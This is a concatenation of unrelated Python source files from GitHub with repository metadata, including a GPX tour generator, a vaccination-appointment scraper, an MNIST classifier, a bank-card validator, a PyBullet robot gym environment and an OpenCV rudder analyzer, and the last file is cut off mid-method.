trk.appendChild(trkseg)
points.apply(append_trkpt, axis=1, trkseg=trkseg, doc=doc)
with open(output_filename, 'w') as fh:
doc.writexml(fh, indent=' ')
def main(input_file):
culture_tour = pd.read_csv('culture_tour.csv')
dessert_tour = pd.read_csv('dessert_tour.csv')
pub_crawl = pd.read_csv('pub_crawl.csv')
scenic_tour = pd.read_csv('scenic_tour.csv')
lodging_df = pd.read_csv(input_file)
lodging_coordinates_df = lodging_df[['lat', 'lon']]
output_gpx(lodging_coordinates_df, 'lodging.gpx')
culture_interest = lodging_df['culture'].values[0]
dessert_interest = lodging_df['dessert'].values[0]
drinks_interest = lodging_df['drinks'].values[0]
scenic_interest = lodging_df['scenic'].values[0]
if (culture_interest == 'y'):
culture_tour_subset_df = culture_tour[['lat', 'lon']]
culture_tour_subset_df = culture_tour_subset_df.append(culture_tour_subset_df.iloc[0])
output_gpx(culture_tour_subset_df, 'culture.gpx')
if (dessert_interest == 'y'):
dessert_tour_subset_df = dessert_tour[['lat', 'lon']]
dessert_tour_subset_df = dessert_tour_subset_df.append(dessert_tour_subset_df.iloc[0])
output_gpx(dessert_tour_subset_df, 'desserts.gpx')
if (drinks_interest == 'y'):
pub_crawl_subset_df = pub_crawl[['lat', 'lon']]
pub_crawl_subset_df = pub_crawl_subset_df.append(pub_crawl_subset_df.iloc[0])
output_gpx(pub_crawl_subset_df, 'drinks.gpx')
if (scenic_interest == 'y'):
scenic_tour_subset_df = scenic_tour[['lat', 'lon']]
scenic_tour_subset_df = scenic_tour_subset_df.append(scenic_tour_subset_df.iloc[0])
output_gpx(scenic_tour_subset_df, 'scenic.gpx')
if __name__ == '__main__':
input_file = sys.argv[1]
main(input_file)
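# Invocation sketch (the CSV name is illustrative): the four tour CSVs loaded above must sit in the
# working directory next to the lodging CSV passed on the command line, e.g.
#   python3 05-generate-gpx.py lodging.csv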
|
tomchiu19/tourPlanner
|
code/05-generate-gpx.py
|
05-generate-gpx.py
|
py
| 2,464
|
python
|
en
|
code
| 0
|
github-code
|
6
|
24254182121
|
import time
import requester
import json
import config
location_id_data = {}
exclude_ids = config.settings["loc_ids_to_exclude"] # Gananoque & Tay Valley Old People One & Prescott
def parseLocationsToDict():
# Locations.json is extracted from the bottom of the pomelo covid-vaccination "locations" html page where you select a spot.
# Kinda stupid so I just extracted it and then saved it as a json.
with open("data/locations.json", encoding="utf-8") as data_file:
location_data = json.loads(data_file.read())["locations"]
for location in location_data:
loc_id = location["loc_id"]
location_id_data[loc_id] = location
def locAddyToAddress(data):
address = data["address"].strip()
# address2 = data["address2"].strip()
city = data["city"].strip()
# province = data["province"].strip()
# country = data["country"].strip()
postal = data["postal"].strip()
loc_address = address + ", " + city + ", " + postal
return loc_address
def check_locations(checking_locations, verbose_output):
config.resetLastAvailableDate()
for x in checking_locations:
if x["id"] not in exclude_ids:
loc_id = x["id"]
loc_name = location_id_data[loc_id]["loc_name"].replace(" ", " ")
loc_address = locAddyToAddress(location_id_data[loc_id]["address"])
unavailable = x["hasUnavailableAppointments"]
if verbose_output:
print(f"{loc_id} {loc_name} ({loc_address})")
if unavailable:
print(f"{loc_id} No appointments available.")
print("*" * 50)
if not unavailable:
earliest_date = requester.findEarliestDate(loc_id)
if earliest_date["available"]:
current_loc_data = earliest_date["nextByLocId"][0]
config_epoch = config.settings["earliest_epoch"]
next_epoch = current_loc_data["next_date"]
readable_time = current_loc_data["next"]
if config_epoch == 0 or next_epoch < config_epoch:
# Found new epoch!
value_list = [readable_time, next_epoch, loc_id, loc_name, loc_address]
key_list = ["earliest_date", "earliest_epoch", "earliest_loc_id", "earliest_loc_name",
"earliest_loc_address"]
config.updateKeys(key_list, value_list)
if verbose_output:
print(f"{loc_id} {readable_time}")
print("*" * 50)
def alertAvailableDate():
latest_epoch = config.settings["earliest_epoch"]
alert_epoch = config.settings["alert_epoch"]
last_epoch_alerted = config.settings["last_epoch_alerted"]
date = config.settings["earliest_date"]
loc_name = config.settings["earliest_loc_name"]
loc_address = config.settings["earliest_loc_address"]
if latest_epoch != 0 and last_epoch_alerted != latest_epoch:
if latest_epoch < alert_epoch:
# New Time is before alert epoch! Announce
print("NEW TIME NEW TIME NEW TIME NEW TIME NEW TIME NEW TIME NEW TIME NEW TIME ")
print("NEW TIME NEW TIME NEW TIME NEW TIME NEW TIME NEW TIME NEW TIME NEW TIME ")
print("NEW TIME NEW TIME NEW TIME NEW TIME NEW TIME NEW TIME NEW TIME NEW TIME ")
print(f"{loc_name} ({loc_address})")
print(f"ALERT NEW TIME: {date})")
config.update("last_epoch_alerted", latest_epoch)
else:
# This will output every time a different earliest date is available.
# Remove to only alert before the alert epoch
print(f"{loc_name} ({loc_address})")
print(f"AVAILABLE: {date}")
config.update("last_epoch_alerted", latest_epoch)
if __name__ == "__main__":
print("Pomelo Vaccination Appointment Date Scraper")
print("*" * 50)
parseLocationsToDict()
#requester.getHMSession()
active_locations = requester.getLocations()
check_locations(active_locations, True)
alertAvailableDate()
print("*" * 50)
time.sleep(60)
for i in range(5000):
active_locations = requester.getLocations()
check_locations(active_locations, False)
alertAvailableDate()
print("*" * 50)
time.sleep(60)
|
TASelwyn/PomeloScraper
|
main.py
|
main.py
|
py
| 4,417
|
python
|
en
|
code
| 0
|
github-code
|
6
|
1708447421
|
from __future__ import print_function
import numpy as np
import matplotlib.pyplot as plt
import ball_endmill
from utility import mm_to_inch
from utility import plot_circle
def plot_spheremill_toolpos(params):
# Extract parameters
diam_tool = params['diam_tool']
diam_sphere = params['diam_sphere']
tab_thickness = params['tab_thickness']
offset_z = params['center_z'] + 0.5*diam_sphere
margin = params['margin']
# Plot sphere
cx_sphere = 0.0
cy_sphere = -0.5*diam_sphere + offset_z
plot_circle(cx_sphere, cy_sphere, 0.5*diam_sphere)
plot_circle(cx_sphere, cy_sphere, 0.5*diam_sphere+margin,'c')
plt.plot([-diam_sphere,diam_sphere],[cy_sphere, cy_sphere], 'k')
plt.plot([-diam_sphere,diam_sphere],[cy_sphere+0.5*tab_thickness, cy_sphere+0.5*tab_thickness], 'b')
plt.plot([-diam_sphere,diam_sphere],[cy_sphere-0.5*tab_thickness, cy_sphere-0.5*tab_thickness], 'b')
# Plot ball nose end mills
toolpath_annulus_data = ball_endmill.get_toolpath_annulus_data(params)
for data in toolpath_annulus_data:
for sgn in (1,-1):
radius = sgn*data['radius']
step_z = data['step_z']
plot_circle(radius, step_z+0.5*diam_tool, 0.5*diam_tool,color='g')
plt.plot([radius], [step_z+0.5*diam_tool], '.g')
plt.plot([radius], [step_z], 'xr')
#plt.plot([radius, 0.0], [step_z+0.5*diam_tool,params['center_z']], 'r')
# Plot material boundaries
dx = 2*params['diam_sphere']
dy = 2*params['center_z']
plt.plot([-dx, dx], [0, 0],'k')
plt.plot([-dx, dx], [dy, dy], 'k')
# -----------------------------------------------------------------------------
if __name__ == '__main__':
params = {
'diam_sphere' : mm_to_inch(12.0),
'diam_tool' : 1.0/8.0 ,
'margin' : 0.0,
'step_size' : 0.01,
'tab_thickness' : 0.02,
'center_z' : -0.75/2.0,
}
fig_num = 1
plt.figure(fig_num)
plot_spheremill_toolpos(params)
plt.axis('equal')
plt.grid('on')
plt.show()
|
willdickson/sphere_mill_gcode
|
sphere_mill_gcode/ball_endmill_viz.py
|
ball_endmill_viz.py
|
py
| 2,135
|
python
|
en
|
code
| 0
|
github-code
|
6
|
25693073835
|
# coding=gbk
# Functions part_3: return values -- making use of the return statement
# part_3.1 returning a simple value
def get_formatted_name(first_name, last_name):
    """Return a neatly formatted full name."""
    full_name = first_name + " " + last_name
    return full_name.title()
musician = get_formatted_name('jen', 'hex')
print(musician)
# the return statement hands a value back to the line that called the function
# when calling a function that returns a value, assign the result to a variable
# part_3.2 making an argument optional: positional arguments plus a default value let an argument be optional
def get_formatted_name(first_name, middle_name, last_name):
    """Return a neatly formatted full name."""
    full_name = first_name + " " + middle_name + " " + last_name
    return full_name.title()
musician = get_formatted_name('jen', 'lei', 'fu')
print(musician)
# if there is no middle name, move that parameter to the end and give it a default value
def get_formatted_name(first_name, last_name, middle_name=''):
    """Return a neatly formatted full name."""
    if middle_name:
        full_name = first_name + " " + middle_name + " " + last_name
    else:
        full_name = first_name + " " + last_name
    return full_name.title()
musician = get_formatted_name('lei', 'fu')
print(musician)
musician = get_formatted_name('lei', 'fu', 'tian')
print(musician)
# if statement, positional arguments, default values
# part_3.3 returning a dictionary: a function body can build a dictionary, list, string or number and return it through a variable
def build_person(first_name, last_name):
    """Return a dictionary containing information about a person."""
    person = {'first': first_name, 'last': last_name}
    return person
musician = build_person('jen', 'hex')
print(musician)
# returning a dictionary that also stores the age
def build_person(first_name, last_name, age=''):
    """Return a dictionary containing information about a person."""
    person = {
        'first': first_name,
        'last': last_name,
    }
    if age:
        person['age'] = age
    return person
musician = build_person('jen', 'ten', age=27)
print(musician)
# part_3.4 combining a function with a while loop
def get_formatted_name(first_name, last_name):
    """Return a neatly formatted full name."""
    full_name = first_name + " " + last_name
    return full_name.title()
# set up the loop
while True:
print("\nPlease tell me your name : ")
    print("Enter 'q' at any time to quit.")
f_name = input("First name : ")
if f_name == 'q':
break
l_name = input("Last name : ")
if l_name == 'q':
break
formatted_name = get_formatted_name(f_name, l_name)
print("\nHello, " + formatted_name + "!")
|
Troysps/learn_python
|
61/ๅฝๆฐ3_่ฟๅๅผ.py
|
ๅฝๆฐ3_่ฟๅๅผ.py
|
py
| 2,326
|
python
|
en
|
code
| 0
|
github-code
|
6
|
9661128383
|
def gcd(A: int, B: int):
if B == 0:
return A
else:
return gcd(B, A % B)
A, B = map(int, input().split())
result = gcd(A, B)
while result > 0:
print(1, end='')
result -= 1
# if the larger number is evenly divisible by the smaller one, the smaller one is the greatest common divisor
# otherwise keep taking remainders; once the remainder reaches 0, the other value is the greatest common divisor
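# Worked example (sketch): for the input "3 6", gcd(3, 6) -> gcd(6, 3) -> gcd(3, 0) -> 3,
# so the loop prints "111", i.e. the digit 1 repeated gcd(A, B) times.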
|
java-squid/lets-algorithm
|
07--number-theory/ragdoll/1850.py
|
1850.py
|
py
| 365
|
python
|
ko
|
code
| 0
|
github-code
|
6
|
18597795385
|
class BankCard:
def __init__(self, number, cvc, first_name, last_name):
self.number = number
self.cvc = cvc
self.first_name = first_name
self.last_name = last_name
def _luhn_algorithm(self, value):
card_sum = 0
for index, digit in enumerate(value):
digit = int(digit)
if index % 2 == 0:
digit *= 2
if digit > 9:
digit -= 9
card_sum += digit
if card_sum % 10 != 0:
raise ValueError("Invalid card number")
@property
def number(self):
return self._number
@number.setter
def number(self, value):
if len(value) != 16:
raise ValueError("Card number length must be 16.")
if not value.isdigit():
raise ValueError("Card number must contains only integers.")
if value[0] not in ('4', '5'):
raise ValueError("Unsupported payment gateway.")
self._luhn_algorithm(value)
self._number = value
@property
def cvc(self):
return self._cvc
@cvc.setter
def cvc(self, value):
if len(value) != 3:
raise ValueError("Invalid cvc code")
self._cvc = value
bc1 = BankCard("4561261212345467", '123', None, None)  # cvc must be exactly 3 digits
print(bc1)
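# Additional sketch: a number that fails the Luhn check is rejected by the setter
# (the value below is the card number above with its final digit changed).
try:
    BankCard("4561261212345468", '123', None, None)
except ValueError as err:
    print(err)  # Invalid card number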
|
pyteacher123/py35-onl
|
lesson15/classwork/task2.py
|
task2.py
|
py
| 1,323
|
python
|
en
|
code
| 2
|
github-code
|
6
|
10933119158
|
import os
import cv2  # computer vision
import numpy as np
import matplotlib.pyplot as plt
import tensorflow as tf
mnist = tf.keras.datasets.mnist  # handwritten digit images and their labels
(x_train, y_train), (x_test, y_test) = mnist.load_data()  # split into training and test data || x is the pixel data, y is the digit label
x_train = tf.keras.utils.normalize(x_train, axis=1)  # scale all values to 0-1 instead of 0-255
x_test = tf.keras.utils.normalize(x_test, axis=1)
model = tf.keras.models.Sequential()
model.add(tf.keras.layers.Flatten(input_shape=(28, 28)))  # flattens the 28x28 grid into one line of 784 pixels
model.add(tf.keras.layers.Dense(236, activation='relu'))  # rectified linear unit
model.add(tf.keras.layers.Dense(10, activation="softmax"))  # output layer || softmax = pick the most confident neuron
model.compile(optimizer='adam', loss='sparse_categorical_crossentropy', metrics=['accuracy'])
model.fit(x_train, y_train, epochs=3)  # Train model || epoch = how many times the network sees the same data
model.save('HandWriteModel.model')
#model = tf.keras.models.load_model('HandWriteModel')
image_number = 1
while os.path.isfile(f"DigetsByMe\\diget{image_number}.png"):
try:
        img = cv2.imread(f"DigetsByMe\\diget{image_number}.png")[:,:,0]  # keep a single colour channel
img = np.invert(np.array([img]))
prediction = model.predict(img)
print(f"The number is {np.argmax(prediction)}")
plt.imshow(img[0], cmap=plt.cm.binary)
plt.show()
except:
        print("Image is probably not 28 by 28")
finally:
image_number += 1
loss, accuracy = model.evaluate(x_test, y_test)
print(loss)
print(accuracy)
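# Optional sanity check (sketch): predict a single test-set digit with the model trained above.
sample = np.expand_dims(x_test[0], axis=0)  # shape (1, 28, 28), matching the Flatten input
print("Predicted:", np.argmax(model.predict(sample)), "Actual:", y_test[0])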
|
Zippy-boy/HandDigets
|
main.py
|
main.py
|
py
| 1,658
|
python
|
en
|
code
| 0
|
github-code
|
6
|
33702855496
|
import socket
HOST = "127.0.0.1" # localhost
PORT = 1234 # pixelflut-port
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
sock.connect((HOST, PORT))
XMIN=641
XMAX=1279
YMIN=0
YMAX=719
for y in range(YMIN, YMAX+1):
for x in range(XMIN, XMAX+1):
msg = bytes(f"PX {x} {y} FF0000\n", "UTF-8")
sock.sendall(msg)
|
HacktoberfestMunich/Hacktoberfest-2023
|
Teams/red_titans/src/RedBackground.py
|
RedBackground.py
|
py
| 403
|
python
|
en
|
code
| 0
|
github-code
|
6
|
73700516027
|
import os, time, gc
import numpy as np
import gym
import random
from gym import spaces
from gym.utils import seeding
from screeninfo import get_monitors
import pybullet as p
from .agents.objects import Object
from .util import Util
from .agents.agent import Agent
class BaseEnv(gym.Env):
def __init__(self, time_step=0.02, frame_skip=5, render=False, gravity=-9.81, seed=1001):
self.time_step = time_step
self.frame_skip = frame_skip
self.gravity = gravity
self.id = None
self.gui = False
self.gpu = False
self.view_matrix = None
self.seed(seed)
if render:
self.render()
else:
self.id = p.connect(p.DIRECT)
self.util = Util(self.id, self.np_random)
self.directory = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'assets')
# Define action space for each robot
self.action_space_robot = {}
for robot_name, robot_class in self.my_robots.items():
action_robot_len = len(robot_class.controllable_joint_indices)
# Add gripper action if gripper is enabled
if len(self.gripper_enabled_robots) == len(self.my_robots) and self.gripper_enabled_robots[robot_name]:
action_robot_len += 1
elif len(self.gripper_enabled_robots) != len(self.my_robots):
print("Gripper enabling mode for robots needs to be defined for every single robot")
exit()
self.action_space_robot[robot_name] = spaces.Box(low=np.array([-1.0]*action_robot_len, dtype=np.float32), high=np.array([1.0]*action_robot_len, dtype=np.float32), dtype=np.float32)
# Define observation space for each robot
self.observation_space_robot = {}
for robot_name, robot_class in self.my_robots.items():
if len(self.obs_len_robots) == len(self.my_robots):
obs_robot_len = self.obs_len_robots[robot_name]
else:
                print("Received observation lengths for robots need to be defined for every single robot")
exit()
self.observation_space_robot[robot_name] = spaces.Box(low=np.array([-1000000000.0]*obs_robot_len, dtype=np.float32), high=np.array([1000000000.0]*obs_robot_len, dtype=np.float32), dtype=np.float32)
self.plane = Agent()
def step(self, action):
raise NotImplementedError('Implement observations')
def _get_obs(self, agent=None):
raise NotImplementedError('Implement observations')
def seed(self, seed=None):
self.np_random, seed = seeding.np_random(seed)
return [seed]
def set_seed(self, seed=1000):
self.np_random.seed(seed)
def enable_gpu_rendering(self):
self.gpu = True
def disconnect(self):
p.disconnect(self.id)
def reset(self):
p.resetSimulation(physicsClientId=self.id)
if not self.gui:
# Reconnect the physics engine to forcefully clear memory when running long training scripts
self.disconnect()
self.id = p.connect(p.DIRECT)
self.util = Util(self.id, self.np_random)
if self.gpu:
self.util.enable_gpu()
# Configure camera position
p.resetDebugVisualizerCamera(cameraDistance=8, cameraYaw=90, cameraPitch=-30, cameraTargetPosition=[0, 0, 1], physicsClientId=self.id)
p.configureDebugVisualizer(p.COV_ENABLE_MOUSE_PICKING, 0, physicsClientId=self.id)
p.configureDebugVisualizer(p.COV_ENABLE_GUI, 0, physicsClientId=self.id)
p.setTimeStep(self.time_step, physicsClientId=self.id)
# Disable real time simulation so that the simulation only advances when we call stepSimulation
p.setRealTimeSimulation(0, physicsClientId=self.id)
p.setGravity(0, 0, self.gravity, physicsClientId=self.id)
self.last_sim_time = None
self.iteration = 0
self.task_success_clock = 0
self.task_success_switch = False
self.task_success = {}
for robot_name, robot in self.my_robots.items():
self.task_success[robot_name] = 0
self.updatable_objects = {}
Object.instances = []
self.threshold_picking = 0.02
def create_world(self):
# Load the ground plane
plane = p.loadURDF(os.path.join(self.directory, 'plane', 'plane.urdf'), physicsClientId=self.id)
self.plane.init(plane, self.id, self.np_random, indices=-1)
# Randomly set friction of the ground
# self.plane.set_frictions(self.plane.base, lateral_friction=self.np_random.uniform(0.025, 0.5), spinning_friction=0, rolling_friction=0)
# Disable rendering during creation
p.configureDebugVisualizer(p.COV_ENABLE_RENDERING, 0, physicsClientId=self.id)
# Create robots
for _, robot in self.my_robots.items():
robot.init(self.directory, self.id, self.np_random)
robot.set_gravity(0, 0, 0)
finger_COM_pos, _ = robot.get_finger_COM()
robot.finger_COM_sphere = self.create_sphere(radius=0.003, mass=0.0, pos=finger_COM_pos, collision=False, rgba=[0.5, 0.5, 0.5, 0.5])
def take_step(self, actions, gains=None, forces=None, action_multiplier=0.05, step_sim=True):
if self.last_sim_time is None:
self.last_sim_time = time.time()
self.iteration += 1
for i, (robot_name, robot) in enumerate(self.my_robots.items()):
robot_actions = actions[robot_name].copy()
robot_actions = np.clip(robot_actions, a_min=self.action_space_robot[robot_name].low, a_max=self.action_space_robot[robot_name].high)
robot_actions *= action_multiplier
if len(self.gripper_enabled_robots) == len(self.my_robots) and self.gripper_enabled_robots[robot_name]:
joint_actions = robot_actions[:-1]
gripper_action = True if robot_actions[-1]<0 else False
else:
joint_actions = robot_actions
joint_actions *= robot.action_multiplier
# Append the new action to the current measured joint angles
robot_joint_angles = robot.get_joint_angles(robot.controllable_joint_indices)
# Update the target robot joint angles based on the proposed action and joint limits
for _ in range(self.frame_skip):
below_lower_limits = robot_joint_angles + joint_actions < robot.controllable_joint_lower_limits
above_upper_limits = robot_joint_angles + joint_actions > robot.controllable_joint_upper_limits
joint_actions[below_lower_limits] = 0
joint_actions[above_upper_limits] = 0
robot_joint_angles[below_lower_limits] = robot.controllable_joint_lower_limits[below_lower_limits]
robot_joint_angles[above_upper_limits] = robot.controllable_joint_upper_limits[above_upper_limits]
robot_joint_angles += joint_actions
robot.control(robot.controllable_joint_indices, robot_joint_angles, robot.motor_gains, robot.motor_forces)
if len(self.gripper_enabled_robots) == len(self.my_robots) and self.gripper_enabled_robots[robot_name]:
self.update_grippable_objects(gripper_action, robot_name, robot)
if step_sim:
# Update all agent positions
for _ in range(self.frame_skip):
p.stepSimulation(physicsClientId=self.id)
self.update_targets()
self.update_objects()
self.update_robot_finger_COM()
if self.gui:
# Slow down time so that the simulation matches real time
self.slow_time()
def slow_time(self):
# Slow down time so that the simulation matches real time
t = time.time() - self.last_sim_time
if t < self.time_step:
time.sleep(self.time_step - t)
self.last_sim_time = time.time()
def update_targets(self):
pass
def update_objects(self):
pass
def update_grippable_objects(self, gripper_action, robot_name, robot):
all_distances = []
if self.gripper_enabled_robots[robot_name]:
for object_name, obj in self.all_grippable_objects.items():
for joint in range(-1,p.getNumJoints(obj.body, physicsClientId=self.id)):
finger_COM_pos, finger_COM_orien = robot.get_finger_COM()
obj_pos, _ = obj.get_pos_orient(joint)
dist_finger_COM_to_obj = abs(np.linalg.norm(obj_pos-finger_COM_pos))
all_distances.append(abs(dist_finger_COM_to_obj))
# When distance is lower than threshold then set robot.grippable[object_name]['grippable'] to True
robot.grippable[object_name]['grippable']['joint_'+str(joint)] = True if dist_finger_COM_to_obj < self.threshold_picking else False
# If robot is ready to grip and the object is grippable then update its position
if robot.grippable[object_name]['grippable']['joint_'+str(joint)] and gripper_action:
if robot.grippable[object_name]['constraint']['joint_'+str(joint)] is None:
robot.grippable[object_name]['constraint']['joint_'+str(joint)] = p.createConstraint(robot.body, robot.end_effector, obj.body, joint, p.JOINT_POINT2POINT, [0, 0, 0], parentFramePosition=[0,0,0], childFramePosition=[0, 0, 0], parentFrameOrientation=[0,0,0,1], childFrameOrientation=[0, 0, 0, 1], physicsClientId=self.id)
# robot.control(robot.gripper_indices, robot.closed_gripper, robot.motor_gains, robot.motor_forces)
else:
robot.its_gripping = False
if robot.grippable[object_name]['constraint']['joint_'+str(joint)] is not None:
p.removeConstraint(robot.grippable[object_name]['constraint']['joint_'+str(joint)], physicsClientId=self.id)
robot.grippable[object_name]['constraint']['joint_'+str(joint)] = None
# robot.control(robot.gripper_indices, robot.opened_gripper, robot.motor_gains, robot.motor_forces)
robot.visual_gripping = True if any(i<0.03 for i in all_distances) else False
constraints_list = []
for object_name, obj in self.all_grippable_objects.items():
for const_id, const in robot.grippable[object_name]['constraint'].items():
constraints_list.append(const)
if all(v is None for v in constraints_list):
robot.its_gripping = False
robot.control(robot.gripper_indices, robot.opened_gripper, robot.motor_gains, robot.motor_forces)
robot.buff = 0
else:
robot.its_gripping = True
if robot.buff == 0 and robot.visual_gripping:
robot.control(robot.gripper_indices, robot.closed_gripper, robot.motor_gains, robot.motor_forces)
                robot.buff += 1
def update_robot_finger_COM(self):
for robot_name, robot in self.my_robots.items():
finger_COM_pos, _ = robot.get_finger_COM()
robot.finger_COM_sphere.set_base_pos_orient(finger_COM_pos, [0, 0, 0, 1])
def render(self, mode='human'):
if not self.gui:
self.gui = True
if self.id is not None:
self.disconnect()
try:
self.width = get_monitors()[0].width
self.height = get_monitors()[0].height
except Exception as e:
self.width = 1920
self.height = 1080
self.id = p.connect(p.GUI, options='--background_color_red=0.81 --background_color_green=0.93 --background_color_blue=0.99 --width=%d --height=%d' % (self.width, self.height))
self.util = Util(self.id, self.np_random)
def get_euler(self, quaternion):
return np.array(p.getEulerFromQuaternion(np.array(quaternion), physicsClientId=self.id))
def get_quaternion(self, euler):
return np.array(p.getQuaternionFromEuler(np.array(euler), physicsClientId=self.id))
def setup_camera(self, camera_eye=[0.5, -0.75, 1.5], camera_target=[-0.2, 0, 0.75], fov=60, camera_width=1920//4, camera_height=1080//4):
self.camera_width = camera_width
self.camera_height = camera_height
self.view_matrix = p.computeViewMatrix(camera_eye, camera_target, [0, 0, 1], physicsClientId=self.id)
self.projection_matrix = p.computeProjectionMatrixFOV(fov, camera_width / camera_height, 0.01, 100, physicsClientId=self.id)
def setup_camera_rpy(self, camera_target=[-0.2, 0, 0.75], distance=1.5, rpy=[0, -35, 40], fov=60, camera_width=1920//4, camera_height=1080//4):
self.camera_width = camera_width
self.camera_height = camera_height
self.view_matrix = p.computeViewMatrixFromYawPitchRoll(camera_target, distance, rpy[2], rpy[1], rpy[0], 2, physicsClientId=self.id)
self.projection_matrix = p.computeProjectionMatrixFOV(fov, camera_width / camera_height, 0.01, 100, physicsClientId=self.id)
def get_camera_image_depth(self, light_pos=[0, -3, 1], shadow=False, ambient=0.8, diffuse=0.3, specular=0.1):
assert self.view_matrix is not None, 'You must call env.setup_camera() or env.setup_camera_rpy() before getting a camera image'
w, h, img, depth, _ = p.getCameraImage(self.camera_width, self.camera_height, self.view_matrix, self.projection_matrix, lightDirection=light_pos, shadow=shadow, lightAmbientCoeff=ambient, lightDiffuseCoeff=diffuse, lightSpecularCoeff=specular, physicsClientId=self.id)
img = np.reshape(img, (h, w, 4))
depth = np.reshape(depth, (h, w))
return img, depth
def create_sphere(self, radius=0.01, mass=0.0, pos=[0, 0, 0], visual=True, collision=True, rgba=[0, 1, 1, 1], maximal_coordinates=False, return_collision_visual=False):
sphere_collision = p.createCollisionShape(shapeType=p.GEOM_SPHERE, radius=radius, physicsClientId=self.id) if collision else -1
sphere_visual = p.createVisualShape(shapeType=p.GEOM_SPHERE, radius=radius, rgbaColor=rgba, physicsClientId=self.id) if visual else -1
if return_collision_visual:
return sphere_collision, sphere_visual
body = p.createMultiBody(baseMass=mass, baseCollisionShapeIndex=sphere_collision, baseVisualShapeIndex=sphere_visual, basePosition=pos, useMaximalCoordinates=maximal_coordinates, physicsClientId=self.id)
sphere = Agent()
sphere.init(body, self.id, self.np_random, indices=-1)
return sphere
def randomize_init_joint_angles(self, min_dist=0.5, radius=2, joint_randomness=0.15):
done = False
while not done:
# random_angles = {}
# # Generate random angles for each robot
# for robot_name, robot in self.my_robots.items():
# random_angles[robot_name] = []
# for joint in robot.arm_joint_indices:
# random_angles[robot_name].append(self.np_random.uniform(robot.lower_limits[joint]*joint_randomness, robot.upper_limits[joint]*joint_randomness))
# robot.set_joint_angles(robot.arm_joint_indices, random_angles[robot_name])
for robot_name, robot in self.my_robots.items():
robot_pos, _ = robot.get_base_pos_orient()
random_end_effector_pos = [random.uniform(robot_pos[0]-radius, robot_pos[0]+radius),
random.uniform(robot_pos[1]-radius, robot_pos[1]+radius),
random.uniform(robot_pos[2], robot_pos[2]+radius)]
self.set_end_effector_pos(robot, random_end_effector_pos, threshold=1e-2, maxIter=100)
# Collect all joint pos and obj pos(last 4 joints is enough)
joints_pos = {}
for robot_name, robot in self.my_robots.items():
joints_pos[robot_name] = []
for joint in robot.arm_joint_indices[-5:]:
j_pos, _ = robot.get_pos_orient(joint)
joints_pos[robot_name].append(j_pos)
objects_pos = []
for obj in Object.instances:
for joint in range(-1,p.getNumJoints(obj.body, physicsClientId=self.id)):
obj_pos, _ = obj.get_pos_orient(joint)
objects_pos.append(obj_pos)
# Check for collision between robots and objects in the environment
done = True
for robot_name_i, robot_i in self.my_robots.items():
for robot_name_j, robot_j in self.my_robots.items():
if robot_name_i != robot_name_j:
joints_pos_i = joints_pos[robot_name_i]
joints_pos_j = joints_pos[robot_name_j]
for joint_pos_i in joints_pos_i:
for joint_pos_j in joints_pos_j:
dist = np.linalg.norm(joint_pos_i-joint_pos_j)
if abs(dist) < min_dist:
done = False
            for robot_name, robot in self.my_robots.items():
                for obj_pos in objects_pos:
                    for joint_pos in joints_pos[robot_name]:
                        dist = np.linalg.norm(joint_pos - obj_pos)
                        if abs(dist) < min_dist:
                            done = False
def set_end_effector_pos(self, robot, target_position, target_orient=None, threshold=1e-15, maxIter=1000):
if target_orient is not None and len(target_orient) == 3:
target_orient = self.get_quaternion(target_orient)
closeEnough = False
iter = 0
dist2 = 1e30
while (not closeEnough and iter < maxIter):
joint_pos = p.calculateInverseKinematics(bodyIndex=robot.body, endEffectorLinkIndex=robot.end_effector, targetPosition=target_position, targetOrientation=target_orient, physicsClientId=self.id)
robot.set_joint_angles_all(joint_pos)
ls = p.getLinkState(robot.body, robot.end_effector)
newPos = ls[4]
diff = [target_position[0] - newPos[0], target_position[1] - newPos[1], target_position[2] - newPos[2]]
dist2 = (diff[0] * diff[0] + diff[1] * diff[1] + diff[2] * diff[2])
closeEnough = (dist2 < threshold)
iter = iter + 1
def disable_collision(self, obj_1, obj_2):
body_1 = obj_1.body
body_2 = obj_2.body
for i in range(p.getNumJoints(body_1, physicsClientId=self.id)):
for j in range(p.getNumJoints(body_2, physicsClientId=self.id)):
p.setCollisionFilterPair(body_1, body_2, i, j, 0, physicsClientId=self.id)
def get_euler(self, quaternion):
return np.array(p.getEulerFromQuaternion(np.array(quaternion), physicsClientId=self.id))
def get_quaternion(self, euler):
return np.array(p.getQuaternionFromEuler(np.array(euler), physicsClientId=self.id))
def init_env_variables(self):
# Select all grippable objects
i = 0
self.all_grippable_objects = {}
for obj in Object.instances:
if obj.enable_gripping:
i += 1
object_name = 'object_' + str(i)
self.all_grippable_objects[object_name] = obj
for robot_name, robot in self.my_robots.items():
robot.buff = 0
robot.grippable = {}
robot.ready_to_grip = False
for object_name, obj in self.all_grippable_objects.items():
robot.grippable[object_name] = {'obj': obj, 'grippable': {}, 'constraint': {}}
for joint in range(-1,p.getNumJoints(obj.body, physicsClientId=self.id)):
robot.grippable[object_name]['constraint']['joint_'+str(joint)] = None
|
gabriansa/collaborative-gym
|
collaborative_gym/envs/base_env.py
|
base_env.py
|
py
| 20,082
|
python
|
en
|
code
| 0
|
github-code
|
6
|
35037176201
|
import cv2
import numpy as np
from analyzers.analyseContour import AnalyseContour
from analyzers.contour import Contour
class AnalyseSafran(AnalyseContour):
"""
    Class that measures the height of the rudder (safran) sticking out of the water.
    Attributes:
        x1RefPoint (int): x coordinate of the first reference point, i.e. the highest point of the rudder.
        y1RefPoint (int): y coordinate of the first reference point, i.e. the highest point of the rudder.
        x2RefPoint (int): x coordinate of the second reference point, used to compute the rudder line.
        y2RefPoint (int): y coordinate of the second reference point, used to compute the rudder line.
"""
def __init__(self, x1, y1, x2, y2, x1RefPoint, y1RefPoint, x2RefPoint, y2RefPoint, qualityLimit):
super().__init__(x1, y1, x2, y2, qualityLimit)
self.x1RefPoint = x1RefPoint - x1
self.y1RefPoint = y1RefPoint - y1
self.x2RefPoint = x2RefPoint - x1
self.y2RefPoint = y2RefPoint - y1
    def compute(self, frame):
        """
        Measures the height of the rudder (safran) sticking out of the water.
        """
m = (self.y2RefPoint - self.y1RefPoint) / (self.x2RefPoint - self.x1RefPoint)
p = self.y1RefPoint - m * self.x1RefPoint
cropFrame = frame[self.y1:self.y2, self.x1:self.x2]
qualityIndex = self.embrunDetection.detection(cropFrame)
        # Convert to grayscale and blur
gray_img_safran = cv2.cvtColor(cropFrame, cv2.COLOR_BGR2GRAY)
gray_img_safran = cv2.GaussianBlur(gray_img_safran, (3, 7), 0)
        # Draw all the edges
